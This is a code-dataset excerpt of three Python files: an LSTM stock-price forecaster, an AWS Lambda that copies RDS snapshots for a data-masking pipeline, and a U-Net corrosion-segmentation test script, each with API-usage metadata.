511, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 511, "usage_type": "name"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 518, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 567, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 568, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 568, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 569, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 598, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 618, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 619, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 623, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 632, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 635, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 672, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 672, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 681, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 682, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", 
"line_number": 683, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 683, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 712, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 733, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 737, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 746, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 749, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 759, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 759, "usage_type": "name"}]} +{"seq_id": "24882022462", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport DataPreProcessor\nimport sys\nimport os\nimport csv\nimport tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation\nfrom tensorflow.keras.layers import LSTM\n\npath = \"Data\"\ndirectory = os.fsencode(path)\ndirs = os.listdir(path)\n\nMatcher=pd.read_csv(\"Symbol_Piotroski1.csv\")\n\nTicker=list(Matcher['SYMBOL'])\n\nresult = []\n\nfor file in dirs:\n if file.split('.')[0] in Ticker:\n\n np.random.seed(7)\n\n current_file = \"Data/\" + str(file)\n dataset = pd.read_csv(current_file, usecols=[1,2,3,4])\n dataset = dataset.reindex(index = dataset.index[::-1])\n\n obsolete = np.arange(1, len(dataset) +1, 1)\n\n OHLC_avg = dataset.mean(axis=1)\n OHLC_avg_copy = dataset.mean(axis=1)\n HLC_avg = dataset[['High', 'Low', 'Close']].mean(axis=1)\n close_val = dataset[['Close']]\n\n plt.plot(obsolete, OHLC_avg, 'r', label='OHLC_avg')\n plt.plot(obsolete, HLC_avg, 'b', label='HLC_avg')\n plt.plot(obsolete, close_val, 'g', label='Closing Price')\n plt.legend(loc = 'upper right')\n plt.show()\n\n OHLC_avg = np.reshape(OHLC_avg.values, (len(OHLC_avg),1))\n scaler = MinMaxScaler(feature_range=(0,1))\n OHLC_avg = scaler.fit_transform(OHLC_avg)\n\n train_OHLC = int(len(OHLC_avg) * .75)\n test_OHLC = len(OHLC_avg) - train_OHLC\n train_OHLC, test_OHLC = OHLC_avg[0:train_OHLC,:], OHLC_avg[train_OHLC:len(OHLC_avg),:]\n\n trainX, trainY = DataPreProcessor.new_dataset(train_OHLC,5)\n testX, testY = DataPreProcessor.new_dataset(test_OHLC, 5)\n\n trainX = np.reshape(trainX, (trainX.shape[0], 1,trainX.shape[1]))\n testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n step_size = 5\n\n model = Sequential()\n model.add(LSTM(32, input_shape=(1, step_size), return_sequences=True))\n model.add(LSTM(16))\n model.add(Dense(1))\n model.add(Activation('linear'))\n\n model.compile(loss='mean_squared_error', optimizer='adagrad')\n model.fit(trainX,trainY,epochs=50, batch_size=15, verbose=2)\n\n trainPredict = model.predict(trainX)\n testPredict = model.predict(testX)\n\n # DE-NORMALIZING FOR PLOTTING\n\n trainPredict = scaler.inverse_transform(trainPredict)\n trainY = scaler.inverse_transform([trainY])\n testPredict = scaler.inverse_transform(testPredict)\n testY = scaler.inverse_transform([testY])\n\n # TRAINING RMSE\n trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:, 0]))\n 
print('Train RMSE: %.2f' % (trainScore))\n\n # TEST RMSE\n testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:, 0]))\n print('Test RMSE: %.2f' % (testScore))\n\n # CREATING SIMILAR DATASET TO PLOT TRAINING PREDICTIONS\n trainPredictPlot = np.empty_like(OHLC_avg)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[step_size:len(trainPredict) + step_size, :] = trainPredict\n\n # CREATING SIMILAR DATASSET TO PLOT TEST PREDICTIONS\n testPredictPlot = np.empty_like(OHLC_avg)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(trainPredict) + (step_size * 2) + 1:len(OHLC_avg) - 1, :] = testPredict\n\n # DE-NORMALIZING MAIN DATASET\n OHLC_avg = scaler.inverse_transform(OHLC_avg)\n\n # PLOT OF MAIN OHLC VALUES, TRAIN PREDICTIONS AND TEST PREDICTIONS\n plt.plot(OHLC_avg, 'g', label='original dataset')\n plt.plot(trainPredictPlot, 'r', label='training set')\n plt.plot(testPredictPlot, 'b', label='predicted stock price/test set')\n plt.legend(loc='upper right')\n plt.xlabel('Time in Days')\n plt.ylabel('OHLC Value of Apple Stocks')\n plt.show()\n\n # PREDICT FUTURE VALUES\n last_val = OHLC_avg[np.array([-1, -2, -3, -4, -5])]\n last_val = scaler.fit_transform(last_val)\n # last_val_scaled = last_val/last_val\n # next_val = model.predict(np.reshape(last_val, (1,1,step_size)))\n # print (\"Last Day Value:\", np.asscalar(last_val))\n # print (\"Next Day Value:\", np.asscalar(last_val*next_val))\n\n pred_vals = []\n pred_vals1 = []\n pred_vals1.append(file)\n for i in range(0, 5):\n # last_val_scaled = last_val/last_val\n print(last_val)\n next_val = model.predict(np.reshape(last_val, (1, 1, step_size)))\n pred_vals.append(next_val)\n print(next_val)\n last_val = np.append(last_val, next_val)\n last_val = np.delete(last_val, 0)\n\n # next_vals.append(np.asscalar(model.predict(np.reshape(, (1,1,step_size)))))\n # last_val1.append(next_vals[i-1]*last_val1[i])\n # pred_vals=scaler.inverse_transform(np.array(pred_vals).reshape(1,5))\n\n ### Scaling Values back using last 5 values as scale standard\n pred_vals = np.array(pred_vals).reshape(1, 5)\n last_val_unscaled = np.array(OHLC_avg_copy[np.array([0, 1, 2, 3, 4])]).reshape(1, 5)\n\n scaler = MinMaxScaler(feature_range=(0, 1))\n last_val_scaler = scaler.fit_transform(last_val_unscaled)\n\n pred_vals_rescaled = scaler.inverse_transform(pred_vals)\n\n a = list(pred_vals_rescaled)[0]\n pred_vals1.append(a)\n\n result.append(pred_vals1)\n\n res = pd.DataFrame(result)\n res.to_csv('results.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "Nandish0409/MiniProject", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.fsencode", "line_number": 17, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": 
"call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "22353516718", "text": "import os\nimport json\nimport re\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSTS_CLIENT = boto3.client(\"sts\")\nCUSTOM_KMS_KEY = os.environ['custom_kms_key']\nASSUME_ROLE_ARN = os.environ['assume_role_arn']\n\ndef lambda_handler(event, context):\n \"\"\"Lambda handler for the zeroth lambda of the Maskopy process.\n Args:\n event (dict): AWS Lambda uses this parameter to pass in event data to the handler.\n context (Context): AWS Lambda provides runtime info and meta data.\n Returns:\n :obj:`dict` of str:str: Return dict with details of snapshot that was created.\n Raises:\n MaskopyResourceNotFoundException: Raised if inputs are not valid.\n Exception: Generic exception raised\n if final snapshot name already exists in destination.\n \"\"\"\n\n rds_client_local = boto3.client(\"rds\")\n assume_role_session = create_account_session(\n STS_CLIENT,\n ASSUME_ROLE_ARN,\n context.aws_request_id)\n rds_client = assume_role_session.client('rds')\n\n snapshots_created = []\n application_name = event[\"ApplicationName\"]\n cost_center = event[\"CostCenter\"]\n snapshot_identifier = event['CheckInputs']['firstSnapshotIdentifier']\n engine = event['Engine']\n # Get original snapshot_tags to append to cloned snapshot\n snapshot_tags = [\n {'Key': 'ApplicationName', 'Value': 'MASKOPY'},\n {'Key': 'Cost Center', 'Value': cost_center}\n ]\n\n parameter_group = event.get('RdsParameterGroup')\n if not parameter_group:\n parameter_group = get_parameter_group(rds_client, rds_client_local, snapshot_identifier)\n # If maskopy- snapshot exists, then use already existing snapshot.\n new_snapshot_identifier = (f\"MASKOPY-{application_name}-\"\n f\"{re.sub('[^A-Za-z0-9-]+', '', snapshot_identifier)}-\"\n f\"{context.aws_request_id}\")\n new_snapshot = copy_db_snapshot(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine['Type'],\n snapshot_tags, CUSTOM_KMS_KEY)\n if 'aurora' in engine['Type']:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBClusterSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBClusterSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBClusterIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine':engine['Type'],\n 'EngineVersion':engine['Version']\n })\n else:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBInstanceIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine': engine['Type'],\n 'EngineVersion':engine['Version']\n })\n\n return snapshots_created\n\ndef check_snapshot_exists(rds_client, snapshot_identifier, engine):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n if \"aurora\" in engine:\n return check_snapshot_exists_cluster(rds_client, snapshot_identifier)\n else:\n return 
check_snapshot_exists_instance(rds_client, snapshot_identifier)\ndef check_snapshot_exists_cluster(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_cluster_snapshots(\n DBClusterSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB cluster snapshot: {err}')\n #raise\n return False #CHECK IF VALID OUTPUT\ndef check_snapshot_exists_instance(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_snapshots(\n DBSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB snapshot: {err}')\n raise\ndef copy_db_snapshot(rds_client, snapshot_identifier,\n new_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n if 'aurora' in engine:\n return copy_db_snapshot_cluster(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\n else:\n return copy_db_snapshot_instance(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\ndef copy_db_snapshot_cluster(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot 
identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_cluster_snapshot_parameters = {\n 'SourceDBClusterSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBClusterSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_cluster_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_cluster_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,\n engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_cluster_snapshot(\n **copy_db_cluster_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBClusterSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBClusterSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef copy_db_snapshot_instance(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine,snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_snapshot_parameters = {\n 'SourceDBSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_snapshot(\n **copy_db_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. 
Using existing snapshot.')\n return destination_snapshot_response['DBSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef get_parameter_group(rds_client, rds_client_local, snapshot_identifier):\n \"\"\"Function to get the original parameter group name of snapshot\n Args:\n rds_client (Client): AWS RDS Client object with source session.\n rds_client_local (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier.\n Returns:\n str: A parameter group attached to original RDS instance of snapshot.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)\n rds_instance = rds_client.describe_db_instances(\n DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])\n parameter_group = (rds_instance['DBInstances'][0]\n ['DBParameterGroups'][0]\n ['DBParameterGroupName'])\n check_valid_parameter_group(rds_client_local, parameter_group)\n return parameter_group\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n if err.response['Error']['Code'] == 'DBInstanceNotFound':\n print(\"Original RDS not available.\")\n print(err)\n raise Exception(\"Parameter group not provided and cannot be extrapolated.\")\ndef check_valid_parameter_group(rds_client, parameter_group_name):\n \"\"\"Function to check for valid parameter group in destination environment.\n Args:\n rds_client (Client): AWS RDS Client object.\n parameter_group_name (str): The parameter group name.\n Raises:\n MaskopyResourceNotFoundException: Exception raised if resource is not found.\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n if not parameter_group_name:\n raise MaskopyResourceNotFoundException(\"Please enter a valid RdsParameterGroup.\")\n print(f'Validating parameter group: {parameter_group_name}')\n if not rds_client.describe_db_parameter_groups(\n DBParameterGroupName=parameter_group_name):\n raise MaskopyResourceNotFoundException(\"Please check your RdsParameterGroup.\")\n print(f'Validated parameter group: {parameter_group_name}')\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the parameter group: {err}')\n raise\n \ndef create_account_session(sts_client, role_arn, request_id):\n \"\"\"Function to create and assume account role.\n Args:\n sts_client (Client): AWS STS Client object.\n role_arn (str): The arn of the role to assume a session.\n request_id (str): UUID for session to uniquely identify session name.\n Returns:\n :obj:`boto3.session.Session`:\n A session of the role to be used.\n \"\"\"\n sts_response = sts_client.assume_role(\n RoleArn=role_arn,\n RoleSessionName=request_id\n )\n\n return boto3.session.Session(\n aws_access_key_id=sts_response['Credentials']['AccessKeyId'],\n aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],\n aws_session_token=sts_response['Credentials']['SessionToken']\n )\n\nclass MaskopyThrottlingException(Exception):\n \"\"\"Exception raised 
when AWS request returns a Throttling exception.\n \"\"\"\n\nclass MaskopyResourceNotFoundException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource since the resource does not exist.\n \"\"\"\n\nclass MaskopyResourceException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource.\n \"\"\"\n", "repo_name": "FINRAOS/maskopy", "sub_path": "lambda/02-UseExistingSnapshot/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 15389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 112, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 138, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 191, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 203, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 231, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 242, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 268, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 294, "usage_type": "name"}, {"api_name": "boto3.session.Session", "line_number": 316, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 316, "usage_type": "attribute"}]} +{"seq_id": "20584354716", "text": "import numpy as np\nimport cv2\nfrom keras.preprocessing.image import img_to_array\nimport os\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom keras.models import load_model\n\n\nif __name__==\"__main__\":\n\n\n image_directory = '/content/rede2_unt/dataset_corrosion_pitting/test'\n mask_directory = '/content/rede2_unt/dataset_corrosion_pitting/test mascara'\n folder_test_results = '/content/rede2_unt/dataset_corrosion_pitting/test_results'\n\n image_dataset = []\n\n path1 = image_directory\n files=sorted(os.listdir(path1))\n for i in tqdm(files):\n imge=cv2.imread(path1+'/'+i,1) #mudar 0 para 1 em imagens com cor\n print(i)\n imge=np.flip(imge, axis=1)\n image_dataset.append(img_to_array(imge))\n\n mask_dataset = []\n \n path2 = mask_directory\n files=sorted(os.listdir(path2))\n for j in tqdm(files):\n imge2=cv2.imread(path2+'/'+j,0) #mudar 0 para 1 em imagens com cor\n\n imge2=np.flip(imge2, axis=1)\n\n mask_dataset.append(img_to_array(imge2))\n print(j)\n\n mask_dataset = np.array(mask_dataset)/255.\n image_dataset = np.array(image_dataset)/255.\n\n print(f\"image_dataset: {len(mask_dataset)}\")\n print(f\"mask_dataset: {len(mask_dataset)}\")\n\n # from sklearn.model_selection import train_test_split\n #IMPORTANTE test_size = 0 SIGNIFICA A PORCENTAGEM QUE FICARA COMO TESTE\n # SE test_size = 0.2, SIGNIFICA QUE 20% DAS IMAGENS SERÃO PARA TESTE E NÃO PARA TREINAMENTO\n\n # X_train, X_test, y_train, y_test = train_test_split(image_dataset, mask_dataset, test_size = 0.2, random_state = 0)\n\n pre_trained_unet_model = load_model('custom-unetweights-8000epochs_29_09.h5', compile=False)\n my_model = 
pre_trained_unet_model\n\n # IMPORTANTE O train_test_split LITERALMENTE ESTÁ SEPARANDO UMA % PARA TESTES\n # O QUE, NESTE CASO AQUI, NÃO É NECESSÁRIO\n X_test = image_dataset\n y_test = mask_dataset\n\n for i, name in enumerate(files, start=0):\n\n test_img = X_test[i]\n ground_truth = y_test[i]\n\n test_img_input=np.expand_dims(test_img, 0)\n prediction = (my_model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n\n plt.figure(figsize=(16, 8))\n plt.subplot(231)\n plt.title('Testing Image')\n plt.imshow(test_img, cmap='gray')\n plt.subplot(232)\n plt.title('Testing Label')\n plt.imshow(ground_truth[:,:,0], cmap='gray')\n plt.subplot(233)\n plt.title('Prediction on test image')\n plt.imshow(prediction, cmap='gray')\n #save the file\n if not os.path.exists(folder_test_results):\n os.makedirs(folder_test_results)\n filename = name\n plt.savefig(os.path.join(folder_test_results,filename))\n\n print(name)\n plt.show()", "repo_name": "Corrosao/rede2_unt", "sub_path": "runtest.py", "file_name": "runtest.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, 